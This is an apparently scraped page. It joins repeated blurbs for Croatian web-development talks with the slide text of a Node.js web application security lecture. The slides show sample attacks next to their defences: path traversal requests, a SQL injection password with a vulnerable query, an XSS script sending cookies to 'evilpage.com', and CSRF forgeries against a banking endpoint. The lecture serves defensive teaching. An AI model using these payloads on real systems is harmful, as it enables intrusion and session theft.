[TVZ računarstvo] Dinamičke web aplikacije, predavanje 8. Stipe Predanic
Predavanje iz Dinamičkih web aplikacija, 8. predavanje
Video:https://www.youtube.com/watch?v=HwjGUZpA1VQ&index=9&list=PLYqeapOP_CtS0kbdbo_GXFgnS81JGAd8L
Tema: Sigurnost web aplikacija
Datum snimanja: 28.4.2016
U Srcu razvijamo, održavamo i dajemo podršku za veliki broj sustava, gdje se svaki sastoji od niza servisa i aplikacija, broj aktivnih korisnika ide i preko 150.000 (uglavnom iz akademske zajednice), a ti sustavi rade na raznim platformama (Java, .Net, PHP, ...). Potrebe i želje korisnika za doradama, nadogradnjama i proširenjima sustava konstantno rastu kako rastu i sami sustavi. Kako bi i dalje uspješno pratili potrebe korisnika smatramo da nam treba Platform as a service (PaaS) kao temelj za daljnji razvoj i održavanje naših sustava. U prezentaciji je prezentirano u kojim segmentima rada nam PaaS može pomoći.
Often, there is a difference of opinion between IT specialists who make business apps with databases in client-server architecture and those who skipped the client-server architecture altogether and began working on web applications. The former usually (but not always) tend to write their code in the database, while the latter consider the database a “black box”, which often serves only as a data container, while the business logic resides in the application server. There are a lot of other questions. The author thinks that specific needs require consideration. It is important to learn and think, and avoid being narrow-minded and accept a single “truth”. These questions will be considered through the Oracle ADF framework.
Description and analysis of MEAN stack and underlying technologies (Mongo DB, Express, Angular and Node JS). Review of development tools & techniques. Performance, best practices. Common usage scenarios, pros and cons. How to use it, when to use it, when not to use it.
[TVZ računarstvo] Dinamičke web aplikacije, predavanje 8. Stipe Predanic
Predavanje iz Dinamičkih web aplikacija, 8. predavanje
Video:https://www.youtube.com/watch?v=HwjGUZpA1VQ&index=9&list=PLYqeapOP_CtS0kbdbo_GXFgnS81JGAd8L
Tema: Sigurnost web aplikacija
Datum snimanja: 28.4.2016
U Srcu razvijamo, održavamo i dajemo podršku za veliki broj sustava, gdje se svaki sastoji od niza servisa i aplikacija, broj aktivnih korisnika ide i preko 150.000 (uglavnom iz akademske zajednice), a ti sustavi rade na raznim platformama (Java, .Net, PHP, ...). Potrebe i želje korisnika za doradama, nadogradnjama i proširenjima sustava konstantno rastu kako rastu i sami sustavi. Kako bi i dalje uspješno pratili potrebe korisnika smatramo da nam treba Platform as a service (PaaS) kao temelj za daljnji razvoj i održavanje naših sustava. U prezentaciji je prezentirano u kojim segmentima rada nam PaaS može pomoći.
Often, there is a difference of opinion between IT specialists who make business apps with databases in client-server architecture and those who skipped the client-server architecture altogether and began working on web applications. The former usually (but not always) tend to write their code in the database, while the latter consider the database a “black box”, which often serves only as a data container, while the business logic resides in the application server. There are a lot of other questions. The author thinks that specific needs require consideration. It is important to learn and think, and avoid being narrow-minded and accept a single “truth”. These questions will be considered through the Oracle ADF framework.
Description and analysis of MEAN stack and underlying technologies (Mongo DB, Express, Angular and Node JS). Review of development tools & techniques. Performance, best practices. Common usage scenarios, pros and cons. How to use it, when to use it, when not to use it.
As REST is rising in power and importance, statelessness is becoming a priority which is not always easy to acquire since we all love cookies. Even though it’s hard to believe, I have something you’ll like more than cookies – JSON Web Tokens. Join me in this session to learn using a fully stateless authentication with Java (+Spring Security) and JWT, therefore obeying strong REST principles most applications require nowadays.
Panel diskusija - usporedba Web frameworka (IT Showoff)IT Showoff
Kod izrade web projekta postoje razne mogućnosti odabira frameworka na kojem će se projekt bazirati. Mi smo odlučili izdvojili pet glavnih frameworka te oko njih izgraditi kvalitetnu panel diskusiju.
Vjerujemo da većina developera koji će sudjelovati na IT Showoff konferenciji su barem u jednom trenutku svoje karijere radili web site ili web aplikaciju na nekom od odabranih frameworka. Isto tako, vjerojatnost da su koristili, i temeljito isprobali sve njih, je vrlo mala. Zato nam je cilj putem kompetentnih stručnjaka pokušati publici prenijeti iskustva vezana za pojedine tehnologije, njihova osnovna svojstva, prednosti i mane.
Panelisti su svi od reda pravi majstori svog zanata, te će usporedno proći važna svojstva svakog frameworka i usporediti ga s drugima.
Non-functional testing is an important, but often ignored step in the process of developing applications. Gatling is a tool that enables us to simulate load, performs the associated measurement and presents the results of the performance testing. Why is Gatling detected by the ThoughtWorks radar? Because it is based on Akka, Netty and Scala technologies and so this lecture will show that writing performance scripts don’t have to be boring. With the concept and methodology of performance testing, using Gatling, the author will present personal experiences from previous projects testing the JVM applications.
Gatling - oružje u redovima performansnog testiranjaA. Kranjec
Nefunkcionalno testiranje je bitan, ali često zaboravljen element u procesu razvoju aplikacija. Gatling je alat za simulaciju opterećenja na testiranoj aplikaciji, provodi pripadna mjerenja i prezentira rezultate provedenog performansnog testiranja. Zašto je Gatling primijećen od strane ThoughtWorks radara? Zato što je alat baziran na Akka, Netty i Scala tehnologijama te će predavanje pokazati da pisanje performansnih testova ne mora biti dosadno. Uz koncept i metodologiju performansnog testiranja, korištenjem Gatlinga, autor će iznijeti osobna iskustva sa dosadašnjih projekata testiranja JVM aplikacija. Prezentacija sa konferencije JavaCro'14.
[TVZ Računarstvo] Dinamičke web aplikacije, predavanje 5. Stipe Predanic
Predavanje iz Dinamičkih web aplikacija, 5. predavanje
Video: https://www.youtube.com/watch?v=F-Ib79iKle4&list=PLYqeapOP_CtS0kbdbo_GXFgnS81JGAd8L&index=6
Tema: Pristup bazama, sesije, kolačići.
Datum snimanja: 7.4.2016
Zašto je REST stil programske arhitekture tako popularan za realizaciju otvorenih informacijskih sustava? Temeljem iskustava stečenih kroz implementaciju ISVU REST API-ja (https://www.isvu.hr/api/) pokazan je postupak kako se REST API može realizirati te na koje detalje treba posebno paziti.
Dinko Korunić - Skalabilna web rješenja (IT Showoff)IT Showoff
Koji su izazovi kod projektiranja skalabilnih web riješenja? Koji sve parametri utječu na određivanje potrebne infrastrukture i arhitekture sustava? Kako realizirati skalabilnu infrastrukturu na poznatim open-source platformama: Apache, Mysql, Varnish, eZ Publish CMS, i sl. te koji su problemi i rješenja kod izvedbe web sustava temeljenog na eZ Publish CMS-u s obzirom na količinu informacija, potrebnu funkcionalnost te očekivanog broja posjeta.
Vert.x (vertx.io) je relativno novi, asinkroni, poliglotni framework uvjetovan događajima te baziran na JVM-u, a svojevremeno jedan od najpraćenijih projekata na GitHubu. Također, bio je i razlog ozbiljnih napetosti između Red Hata i VMwarea, koje su umalo zaustavile projekt. Cilj ovog predavanja je predstaviti Vert.x svijet, pokazati osnove, te ponuditi najbolja iskustva, prakse i preporuke pri njegovoj uporabi.
Javantura, Zagreb, 2014.
This document provides tips for using React including:
- State updates should use setState rather than directly updating this.state
- The reconciliation algorithm determines how DOM nodes are updated based on component type and props changes
- The shouldComponentUpdate lifecycle method controls subtree rerendering
- ES2016 features like object spreading can simplify code
- Composition and higher order components are alternatives to inheritance for extending functionality
Configuring SSL on NGNINX and less tricky serversAxilis
Sergej Jakovljev explains how to setup different levels of security over SSL. What's the difference between different SSL certificates and how to set them up on NGINX, Heroku and Node.js.
As REST is rising in power and importance, statelessness is becoming a priority which is not always easy to acquire since we all love cookies. Even though it’s hard to believe, I have something you’ll like more than cookies – JSON Web Tokens. Join me in this session to learn using a fully stateless authentication with Java (+Spring Security) and JWT, therefore obeying strong REST principles most applications require nowadays.
Panel diskusija - usporedba Web frameworka (IT Showoff)IT Showoff
Kod izrade web projekta postoje razne mogućnosti odabira frameworka na kojem će se projekt bazirati. Mi smo odlučili izdvojili pet glavnih frameworka te oko njih izgraditi kvalitetnu panel diskusiju.
Vjerujemo da većina developera koji će sudjelovati na IT Showoff konferenciji su barem u jednom trenutku svoje karijere radili web site ili web aplikaciju na nekom od odabranih frameworka. Isto tako, vjerojatnost da su koristili, i temeljito isprobali sve njih, je vrlo mala. Zato nam je cilj putem kompetentnih stručnjaka pokušati publici prenijeti iskustva vezana za pojedine tehnologije, njihova osnovna svojstva, prednosti i mane.
Panelisti su svi od reda pravi majstori svog zanata, te će usporedno proći važna svojstva svakog frameworka i usporediti ga s drugima.
Non-functional testing is an important, but often ignored step in the process of developing applications. Gatling is a tool that enables us to simulate load, performs the associated measurement and presents the results of the performance testing. Why is Gatling detected by the ThoughtWorks radar? Because it is based on Akka, Netty and Scala technologies and so this lecture will show that writing performance scripts don’t have to be boring. With the concept and methodology of performance testing, using Gatling, the author will present personal experiences from previous projects testing the JVM applications.
Gatling - oružje u redovima performansnog testiranjaA. Kranjec
Nefunkcionalno testiranje je bitan, ali često zaboravljen element u procesu razvoju aplikacija. Gatling je alat za simulaciju opterećenja na testiranoj aplikaciji, provodi pripadna mjerenja i prezentira rezultate provedenog performansnog testiranja. Zašto je Gatling primijećen od strane ThoughtWorks radara? Zato što je alat baziran na Akka, Netty i Scala tehnologijama te će predavanje pokazati da pisanje performansnih testova ne mora biti dosadno. Uz koncept i metodologiju performansnog testiranja, korištenjem Gatlinga, autor će iznijeti osobna iskustva sa dosadašnjih projekata testiranja JVM aplikacija. Prezentacija sa konferencije JavaCro'14.
[TVZ Računarstvo] Dinamičke web aplikacije, predavanje 5. Stipe Predanic
Predavanje iz Dinamičkih web aplikacija, 5. predavanje
Video: https://www.youtube.com/watch?v=F-Ib79iKle4&list=PLYqeapOP_CtS0kbdbo_GXFgnS81JGAd8L&index=6
Tema: Pristup bazama, sesije, kolačići.
Datum snimanja: 7.4.2016
Zašto je REST stil programske arhitekture tako popularan za realizaciju otvorenih informacijskih sustava? Temeljem iskustava stečenih kroz implementaciju ISVU REST API-ja (https://www.isvu.hr/api/) pokazan je postupak kako se REST API može realizirati te na koje detalje treba posebno paziti.
Dinko Korunić - Skalabilna web rješenja (IT Showoff)IT Showoff
Koji su izazovi kod projektiranja skalabilnih web riješenja? Koji sve parametri utječu na određivanje potrebne infrastrukture i arhitekture sustava? Kako realizirati skalabilnu infrastrukturu na poznatim open-source platformama: Apache, Mysql, Varnish, eZ Publish CMS, i sl. te koji su problemi i rješenja kod izvedbe web sustava temeljenog na eZ Publish CMS-u s obzirom na količinu informacija, potrebnu funkcionalnost te očekivanog broja posjeta.
Vert.x (vertx.io) je relativno novi, asinkroni, poliglotni framework uvjetovan događajima te baziran na JVM-u, a svojevremeno jedan od najpraćenijih projekata na GitHubu. Također, bio je i razlog ozbiljnih napetosti između Red Hata i VMwarea, koje su umalo zaustavile projekt. Cilj ovog predavanja je predstaviti Vert.x svijet, pokazati osnove, te ponuditi najbolja iskustva, prakse i preporuke pri njegovoj uporabi.
Javantura, Zagreb, 2014.
This document provides tips for using React including:
- State updates should use setState rather than directly updating this.state
- The reconciliation algorithm determines how DOM nodes are updated based on component type and props changes
- The shouldComponentUpdate lifecycle method controls subtree rerendering
- ES2016 features like object spreading can simplify code
- Composition and higher order components are alternatives to inheritance for extending functionality
Configuring SSL on NGNINX and less tricky serversAxilis
Sergej Jakovljev explains how to setup different levels of security over SSL. What's the difference between different SSL certificates and how to set them up on NGINX, Heroku and Node.js.
Journey to Microservice architecture via Amazon LambdaAxilis
Microservices are one of the latest trends in architecture design.
Made popular by the introduction of Amazon Lambda, Google Cloud Functions and Azure Functions. They seem to offer a way to structure code as a set of independent services that interact together to work as one, making each part simpler and offering an easy way to scale up. But just as every other technology they bring their own set of challenges.
Join us on lessons we learned while converting simple application to work on Lambda.
React, Facebook's Javascript library for creating user interface, often gets skipped when compared to other Javascript MV* frameworks, like Angular, because it only covers the view part of MV*. This doesn't really make the decision easier when it comes to selecting React for your next project or not. If you are having the same doubts, join Ivan Varga on his next MSCummunity talk about React in Zagreb.
http://www.mscommunity.hr/event/angular2-typescript-aspnetcore-react/2439
We all love and hate JavaScript. But with the new ECMAScript standards the love seems to be growing and the hate fading away. Slides from session by Damir Širola about new useful JavaScript features from ES2015 standard.
Developers can find plenty of cool and usefull packages on NuGet. In this session Zvonimir Ilić will show the coolest and most usefull packages for LINQ and how to use them
Say goodbye to PSD files or seeking for those outnumbered Macs to export sketch files. There is a new kind of collaboration between designers and developers. If you missed our Zeplin presentation you can check out our presentation and learn a little more about this collaboration tool.
Kristian Ačkar from Core Incubator visits us to showcase strength of Node.js for real time applications. If you're interested in this topic come and join this lecture in real time at Axilis.
We all love LINQ in C#. Fosna will talk about advanced LINQ concepts like expression trees, how to build them, how to parse them, how to exploit them. We'll review what we learned in first meetup and show few demos. If you're interested in this kind of crazy stuff come and join our meetup.
Notes from last meetup are available at http://www.axilis.com/giving-back/#meetups.
O novoj implementaciji .NET platforme - .NET Core. Modularna, otvorenog koda, a osim na Windows mašinama živi i na Linuxu i Macu. Što sve trebamo znati o .NET Coreu, kakav je odnos s postojećim platformama te zašto nas uopće treba biti briga.
Angular translate is an AngularJS module that simplifies internationalization and localization through a translate directive, translate filter, and $translate service. It allows usage of the translate directive, translate filter, and $translate service. A demo can be found at https://github.com/axilis/angular-translate.
NPM, Bower and Gulp Kickstart in Visual StudioAxilis
Find out what are npm, bower and gulp and what are they doing in Visual Studio 2015. Lecture will show you how to properly start doing Javascript projects in VS and why we wont miss nuget packages.
Almost year and half after it’s first appearance, Apple’s new programming language Swift has reached version 2.1. Apple promises that Swift is powerful, intuitive and fast programming language for iOS, OS X and watchOS. We'll take look at the basic syntax and language constructs using Xcode 7 to see if apple fulfils it's promises. Presentation by Kritijan Frankovic.
Zvonimir Ilic claims that Python can live inside Visual Studio. He'll tell us about Python Tools for Visual Studio. This is extension for creating Python apps. In this lecture he'll show how to debug Python application, install libraries, create virtual environments and other useful features.
Zvonimir Ilic claims that Python can live inside Visual Studio. He'll tell us about Python Tools for Visual Studio. This is extension for creating Python apps. In this lecture he'll show how to debug Python application, install libraries, create virtual environments and other useful features.
With angular 2.0 being in developer preview, it’s a good time to take a sneak peek. To see what to expect and can you benefit from it join us at lecture by Ivan Varga at Axilis and find out.
AngularJS is a JavaScript MVC framework that uses HTML syntax extensions to add dynamic behavior to web pages. It consists of templates, expressions, controllers, models/scopes, modules, services, and directives that allow developers to build single page applications. Angular compiles templates containing directives and expressions into a view. Controllers define the model/scope and are used in templates to access data and functions. Modules allow reusable features and services provide view-independent logic.
4. Path Traversal
• pokušaj pristupa fileovima kojima ne bismo trebali moći
pristupiti
GET http://webapplication.com/static/style.css
app.get('/static/', (req, res) => {
const filename = path.join(process.cwd(), 'static', req.uri);
if (path.existsSync(filename)) {
return res.end(fs.readFileSync(filename));
}
res.status(404).end("Not found");
}
GET http://webapplication.com/static/../app.js
GET http://webapplication.com/static/../index.js
5. Path Traversal
• Ne pokušavat sami rješiti, puno bolji od vas su isto u tome
pogrješili (više puta):
https://expressjs.com/en/advanced/security-updates.html
• Nije jednostavno kao što se čini:
• %2e%2e%2f je isto kao ../
• %2e%2e/ je isto kao ../
• %252e%252e%255c je isto kao ..
• Rješenje je koristiti postojeće metode (expess.static)
app.use(express.static('files'))
6. SQL Injection
• napad koji zahtjeva
• podaci dolaze od nesigurnog izvora
• dinamički se stvara SQL upit pomoću istih
username: sergej@axilis.com
password: ES6>.net
username: sergej@axilis.com
password: " OR 1 --
SELECT * FROM users
WHERE username = "sergej@axilis.com"
AND password = "" OR 1 --"
const username = req.body['username'];
const password = req.body['password'];
const q = `
SELECT * FROM users
WHERE username = "${username}"
AND password = "${password}" `
const results = database.exec(q);
if (results.length) {
resp.session['user'] = results[0];
}
Login data
Login data
Query
7. const username = req.body['username'];
const password = req.body['password'];
const q = `
SELECT * FROM users
WHERE username = :username
AND password = :password `
const results = database.prepare(q).exec({
password, username
});
if (results.length) {
resp.session['user'] = results[0];
}
SQL Injection
• Korištenje prepared statementa (Parameter Binding)
const username = req.body['username'];
const password = req.body['password'];
const q = `
SELECT * FROM users
WHERE username = "${username}"
AND password = "${password}" `
const results = database.exec(q);
if (results.length) {
resp.session['user'] = results[0];
}
10. XSS (Cross Site Scripting)
• ubacivanje malicioznog koda u sadržaj stranice
<script>
window.location="http://evilpage.com/" + window.cookie;
</script>
Leverage agile frameworks to provide a robust
synopsis for high level overviews. Iterative
approaches to corporate strategy foster
collaborative thinking to further the overall value
proposition.
Post.create({
content: req.body.content,
user: req.session.user.id
});
<div class="user-content">
<%- post.content %>
</div>
Model
View
Expected post
Malicious post
11. XSS
• EJS
• normalni <%= object %> tagovi escapeaju
• specijalni <%- object %> eksplicitno ne rade esacpe
• i dalje moguće napravit napad u nekim situacijama (renderanje u JS)
• Prava prevencija je validacija podataka
• Cookie koje je moguće postavit da su HTTP only
http://scottksmith.com/blog/2015/06/22/secure-node-apps-against-owasp-top-10-cross-site-scripting/
http://www.managerjs.com/blog/2015/05/will-ejs-escape-save-me-from-xss-sorta/
React is safe. We are not generating HTML strings so XSS protection is
the default.
13. XSS #2
• Content Security Policy (CSP) – zaglavlje koje kaže
pregledniku od kuda smije učitavati JavaScript i CSS, ne
spriječava skripte koje se cijele injectaju u stranicu
• Ako je moguće upisati bilo što (formfield), jedino rješenje
koje preostaje je sanitizacija sadržaja: express-sanitizer
http://scottksmith.com/blog/2015/06/22/secure-node-apps-against-owasp-top-10-cross-site-scripting/
req.sanitize(item).escape();
14. Session prediction
• relativno jednostavan princip – otkrivanje kako se dodjeljuju
session id-jevi
• ako pogodimo session id odredenog korisnika, automatski
smo ulogirani kao taj korisnik
• vrijedi i za JSW
• treba generirat nasumičan id
http://techidiocy.com/_id-objectid-in-mongodb/
15. CSRF - Cross-Site Request Forgery
• slanje zahtjeva u ime korisnika bez korisikovog saznanja
(posljedica da su poslani i Cookie podaci)
• korištenje POST umjesto GET metode ne rješava problem
GET http://bankingapp.com/transfer?to=1908&ammount=100
<img src="http://bankingapp.com/transfer?to=1908&ammount=100" />
POST http://bankingapp.com/transfer
<form method="POST" action="http://bankingapp.com/transfer">
<input type="text" value="10000" hidden />
<input type="submit" value="Nauci JS!" />
</form>
API endpoint
API endpoint
16. CSRF
• više koraka ispunjavanja transakcija ne pomaže ako su
predvidljivog toka
• moguće pogledati refferer header (samo kod HTTPS-a)
• korištenje nonce tokena prilikom submitanja podataka
• dodatno CORS moze pomoći (samo JS requestovi u
preglednicima)
http://stackoverflow.com/questions/19793695/does-a-proper-cors-setup-prevent-xsrf
17. MITM – Man in the middle
https://www.incapsula.com/images/illustrations/web-app-security-mini-site/man-in-the-middle-mitm.jpg
18. MITM
• razlikuje se of sniffinga po tome što napadač može aktivno
mijenjati podatke koji se prebacuju
• slično kao i kod sniffinga podaci koje korisnik razmijenjuje su
kompriminirani
19. MITM
• korištenje HTTPS-a prevenira u nekoj mjeri
• prevenira dešifriranje podataka sa mreže (sniffinga)
• ne prevenira MITM u potpunosti, ali će klijent biti upozoren da SSL
certifikat nije onaj koji očekuje
• kako je i sam redirect sa HTTP na HTTPS može bit
presretnut, poželjno je omogućitii HSTS (HTTP Strict
Transport Security), tada klijent automatski prebacuje HTTP
u HTTPS zahtjeve
• Cookie mogu postaviti secure zastavicu
• Cookie moguće ograničiti na dio domene
20. Brute force attack
• isprobavanje svih mogućih kombinacija
• na webu se manifestira u dva slučaja
• brute force napad na stranice (pokušaj pogodka podataka)
• dešifriranje ukradene baze lozinka (kada je napadač pomoću nekog
drugog explota došao do baze)
21. Brute force napad na web stranice
• relativno je lagano rješiv, implementacijom ograničenja broja
zahtjeva dohvata odredenih stranica
• ne moraju nužno biti login podaci
• može biti i pokušaj skidanja odredenih normalno nedostupnih
resursa, koji su dostupni bez autorizacije (audio, video, i dr. sadržaja)
• za express postoji jednostavan library sa podrškom za velik
broj backing baza: express-brute
22. Cracking lozinka
• u tom trenutku su već lozinke ukradene, cilj je minimizirati
štetu unaprijed
• pretpostavka je da se ne može imati prejednostavne lozinke
• preporučene hashing funkcije: Argon2, PBKDF2, scrypt,
bcrypt
• sve navedene imajujedan od faktora "težinu" hashiranja
kako bi bilo teže otkriti lozinke korisnika
• ovisno o svrhi aplikacije, razmislite o implementaciji 2-factor
autorizaciji
https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet
23. DoS – Denial of Service
• cilj napada je onemogućiti normalni rad infrastrukture
• najtipičniji npadi su DDoS (Distributed DoS) u kojima tisuće
različitih klijenata se koristi za istovremeni napad kako bi se
iscrpili svi dostupni resursi
• Cash Overflow
• specifična verzija napada ciljana na zloupotrebu servisa sa svrhom
nabijanja troskova i dovoda do bankrota ili postizanja limita na
kojima hosting provider onemogući stranicu
• napadi na API-je koje koristite (npr. Weather API, Video Encoding
API), exploitanje aplikacije za iskoristit 3rd party usluge
https://www.owasp.org/index.php/Denial_of_Service
24. DoS – Denial of Service
• u najopćenitijoj formi gdje mogu dolaziti i milijuni zahtjeva
po sekundi se ne može puno napravit
• moguće je izbjeći situacije u kojima korisnički unos ima veliki
utjecaj na workload potreban za izgenerirati odgovor
• postaviti gornje limite na broj rezultata koji se vraćaju
• analogno gdje se koristi korisnički input (argumenti for petlja)
• ograničiti pristup servisima koji izvode zahtjevne radnje (resizanje slika, zipanje
datoteka, dohvaćanje podataka sa drugih API-ja)
• ograničiti pristup servisima koji stvaraju podatke (cache servis kojem je moguće
zauzeti cijeli diskovni prostor zahtjevima različitih argumenata)
• ograničit pristup dijelovimakoji pristupaju 3rd party API
26. Validacija podataka
• vlastite metode validacije ili copy-paste sa Stackoverflow-a
često mogu dovesti do loših ili krivih provjera podataka
/[-+]?([0-9])*.?([0-9]*)/.test("<script>bok2</script>")
/[-+]?([0-9])+.?([0-9]*)/.test("<script>bok2</script>")
/^[-+]?([0-9])+.?([0-9]*)$/.test("<script>bok2</script>")
https://www.owasp.org/index.php/Overly_Permissive_Regular_Expression
=> true
=> true
=> false
28. Deserijalizacija podataka
• deserijalizirani podaci mogu biti važećeg formata ali to ne
znaći da su sigurni (npr. NoSQL Injection)
• moguće je zloupotrijebit aplikacijsku logiku (npr. rekurzivne
reference)
• korisnik mora biti autentificiran prije nego krenemo
deserijalizirati podatke
• moguć napad velikim payloadom (parsiraj 20MB JSON)
https://www.owasp.org/index.php/Deserialization_of_untrusted_data
30. Sigurnost "tajni"
• nikad ne spremati API keyeve u kod
• postoje jednostavna a puno sigurnija rješenja (.env file)
https://wptavern.com/ryan-hellyers-aws-nightmare-leaked-access-keys-result-in-a-6000-bill-overnight
“In total, there seemed to be around 600
servers running. The time between realizing
all this and uploading my Git repository was
approximately 12 hours.”
export MONGO_STRING="mongodb://uri"
export NODE_ENV="production"
source ./.env
.env file
Terminal (set variables)
31. AWS Credentials
• koristiti IAM za postaviti AWS API keyeve
• User – credentiali za korisnika ili API key
• Group – skupina više usera
• Role – dopuštenje odredenih prava (bez potrebe za AWS key-em)
• dodjeliti minimalna potrebna prava
• root accountobavezno zastititi 2-factor authenticationom
32. Vault
• jedan od servisa koji nude sigurnu pohranu i dohvat "tajni"
• ideja shareati pristup samo podacima koji su neophodni
• izbjegava se potreba za slanjem tajni "preko Slacka" :D
• mogućnost oduzimanja pristupa
https://www.amon.cx/blog/managing-all-secrets-with-vault/
https://spring.io/blog/2016/06/24/managing-secrets-with-vault
https://www.codementor.io/slavko/how-to-install-vault-hashicorp-secure-deployment-secrets-du107xlqd
33. AWS WAF – Web Application Firewall
https://eng.goprimer.com/deploying-aws-s-web-application-firewall-on-cloudfront-with-dynamic-content-from-an-elastic-6e633ff97fd5
34. AWS WAF
• moguće je postaviti pravila koja preveniraju tipične napade
kao što su SQL injection i XSS
• moguće je ograničit pristup resursima ovisno o dijelovima
HTTP zahtjeva (Cookie, Header, prvih 8kB tijela…)
http://docs.aws.amazon.com/waf/latest/developerguide/web-acl-string-conditions.html
AWS WAF is a web application firewall that
lets you monitor the HTTP and HTTPS
requests that are forwarded to CloudFront,
and lets you control access to your content.
35. Don't trust user input.
Don't (re)invent your own security
methods.
Recap
36. Preporučeni linkovi
• The Basics of Web Application Security
https://martinfowler.com/articles/web-security-basics.html
• Open Web Application Security Project
https://www.owasp.org/index.php/Main_Page
• 6 Ways To Strengthen Web App Security
http://www.darkreading.com/risk-management/6-ways-to-
strengthen-web-app-security/d/d-id/1106197
• Helmet – set Express middlewareova koji povećavaju sigurnost
https://www.npmjs.com/package/helmet